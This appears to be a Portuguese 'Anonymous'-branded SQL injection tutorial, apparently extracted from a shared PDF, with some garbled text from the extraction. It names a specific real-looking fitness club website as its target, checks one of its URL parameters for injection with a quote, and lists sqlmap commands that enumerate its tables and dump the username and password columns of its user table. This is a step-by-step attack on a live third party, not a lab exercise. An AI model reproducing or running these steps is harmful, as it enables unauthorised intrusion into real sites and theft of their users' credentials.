Você está na página 1de 6

S

audaes irmos e irms ANONYMOUS , tomo a liberdade atravs desse compedium de


instru-los
los nas tcnicas de Penteste, sem muitas teorias para no ficar cansativo, neste primeiro
momento vamos estudar SQLi .

Neste primeiro trabalho vamos fazer na nossa odiada plataforma Microsoft , pois muitos pseudos hackers
afirmam que ser hacker usar apenas LINUX na verdade o verdadeiro CYBERATIVISTA SABE UTILIZAR
NO S LINUX MAS TODOS OS S.O ABRANGENDO TAMBEM A AREA DE
DE ELETRNICA.
****************************************************************************
**************************************************************************************
**************************************************************************************
*********************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
1 Etapa: Escolha do Target:
Neste momento o alvo escolhido antecipadamente ou atravez de Dorks http://pastebin.com/zzTkMvjj.
http://pas
No caso do alvo escolhido antecipadamente podemos encontrar venerabilidades atravs de um leque
extenso de ferramentas ou mesmo com tcnicas manuais, como este Tutorial bsico vamos analisar o
alvo escolhido com o Atomic scanner http://sourceforge.net/projects/scanner
://sourceforge.net/projects/scanner-atomic/ .
Vamos analisar o seguinte alvo atravs da captura de links do site http://www.fitnesshut.pt
www.fitnesshut.pt /.
**************************************************************************************
**************************************************************************************
**************************************************************************************

2 Etapa: Verificao da Vulnerabilidade SQL.


Aps a captura podemos verificar se existe erro SQLi nos links mostrados vamos verificar o seguinte link:
http://www.fitnesshut.pt/clube.php?id=1 , como vocs devem saber a verificao dada atravs de aspas
simples no final do link .

Se ao invs da antecipao da escolha do alvo fizssemos a busca por Google Dorks acharamos da mesma
forma.

3 Etapa: mapeamento do BD
Nesta etapa vamos utilizar um programa intitulado SLMAP http://sqlmap.org/ e phyton
http://www.python.org/getit/ .
Aps a devida instalao dos programas vamos a injeo:

C:\>sqlmap.py u http://www.fitnesshut.pt/clube.php?id=1

C:\>sqlmap.py u http://www.fitnesshut.pt/clube.php?id=1 --tables


Neste momento voc deve analisar todas as tabelas, no neste caso, pois de cara ele te mostra a tabela
user .

C:\>sqlmap.py u http://www.fitnesshut.pt/clube.php?id=1 T user --columns

C:/>sqlmap.py u http://www.fitnesshut.pt/clube.php?id=1 T user C password --dump

C:\>sqlmap.py u http://www.fitnesshut.pt/clube.php?id=1 T user C username --dump

Você também pode gostar